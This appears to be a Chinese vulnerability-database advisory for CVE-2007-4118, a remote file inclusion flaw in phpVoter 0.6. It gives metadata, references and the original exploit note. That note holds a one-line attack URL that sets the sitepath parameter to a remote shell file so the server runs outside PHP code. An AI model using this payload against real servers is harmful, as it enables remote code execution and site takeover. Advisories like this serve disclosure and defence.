phpVoter 'includes/functions.inc.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189598 漏洞类型 未知
发布时间 2007-08-01 更新时间 2007-08-01
CVE编号 CVE-2007-4118 CNNVD-ID CNNVD-200708-003
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/85500
https://cxsecurity.com/issue/WLB-2007080006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-003
|漏洞详情
phpVoter0.6版本的includes/functions.inc.php中存在PHP远程文件包含漏洞。远程攻击者可以借助sitepath参数中的一个URL,执行任意PHP代码。
|漏洞EXP
# # # # # # # # # # # # # # # # # # # # # # # # #

# phpVoter v0.6 Remote File Include Vulnerability

# ilker kandemir <ilkerkandemir[at]mynet.com>

# Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-0_6.zip

# TnX.: Ajann, Dumenci, H0tTurk, Str0ke

# # # # # # # # # # # # # # # # # # # # # # # # #

# Exploit: includes/functions.inc.php?sitepath=http://shell.txt?

# # # # # # # # # # # # # # # # # # # # # # # # #
|受影响的产品
Jx Development Phpvoter 0.6
|参考资料

来源:BUGTRAQ
名称:20070730phpVoterv0.6RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/475100/100/0/threaded
来源:OSVDB
名称:39030
链接:http://osvdb.org/39030
来源:XF
名称:phpvoter-functions-file-include(35691)
链接:http://xforce.iss.net/xforce/xfdb/35691
来源:SREASON
名称:2939
链接:http://securityreason.com/securityalert/2939